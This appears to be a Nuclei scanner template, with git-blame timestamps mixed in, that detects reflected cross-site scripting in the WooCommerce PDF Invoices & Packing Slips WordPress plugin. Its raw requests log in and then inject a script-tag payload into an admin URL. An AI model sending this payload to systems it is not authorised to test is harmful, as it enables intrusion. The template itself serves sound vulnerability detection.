2022-07-06 09:43:25 +00:00
id : woocommerce-pdf-invoices-xss
info :
2022-09-08 13:28:46 +00:00
name : WordPress WooCommerce PDF Invoices & Packing Slips <2.15.0 - Cross-Site Scripting
2022-07-06 09:43:25 +00:00
author : Akincibor
severity : medium
2022-09-08 13:28:46 +00:00
description : WordPress WooCommerce PDF Invoices & Packing Slips 2.15.0 does not escape some URLs before outputting them in attributes, leading to reflected cross-site scripting.
2022-07-06 09:43:25 +00:00
reference :
- https://wpscan.com/vulnerability/bc05dde0-98a2-46e3-b2c8-7bdc8c32394b
- https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
2022-09-08 13:28:46 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score : 7.2
cwe-id : CWE-79
2022-08-27 04:41:18 +00:00
tags : xss,wp,wordpress,woocommerce,authenticated,wpscan,wp-plugin
2022-07-06 09:43:25 +00:00
requests :
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Origin : {{RootURL}}
Content-Type : application/x-www-form-urlencoded
Cookie : wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=wpo_wcpdf_options_page&tab=documents§ion=invoice&"><script>alert(document.domain)</script> HTTP/1.1
Host : {{Hostname}}
2022-07-06 09:55:31 +00:00
cookie-reuse : true
2022-07-06 09:43:25 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-07-06 09:49:30 +00:00
- "><script>alert(document.domain)</script>"
2022-07-06 09:43:25 +00:00
- "WooCommerce PDF Invoices"
condition : and
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2022-09-08 13:28:46 +00:00
# Enhanced by mp on 2022/09/07